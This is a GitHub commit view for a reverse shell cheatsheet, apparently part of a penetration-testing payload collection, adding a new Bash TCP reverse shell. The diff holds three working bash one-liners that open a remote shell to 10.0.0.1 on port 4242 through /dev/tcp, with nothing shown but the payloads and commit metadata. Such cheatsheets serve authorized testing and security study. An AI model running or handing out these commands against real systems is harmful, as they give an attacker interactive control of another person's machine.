Update Reverse Shell Cheatsheet.md

Added new Bash TCP reverse shell
This commit is contained in:
pswalia2u 2021-03-28 18:58:07 +05:30 committed by GitHub
parent 0443babe35
commit 209380740b
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -44,6 +44,8 @@
bash -i >& /dev/tcp/10.0.0.1/4242 0>&1
0<&196;exec 196<>/dev/tcp/10.0.0.1/4242; sh <&196 >&196 2>&196
/bin/bash -l > /dev/tcp/10.0.0.1/4242 0<&1 2>&1
```
### Bash UDP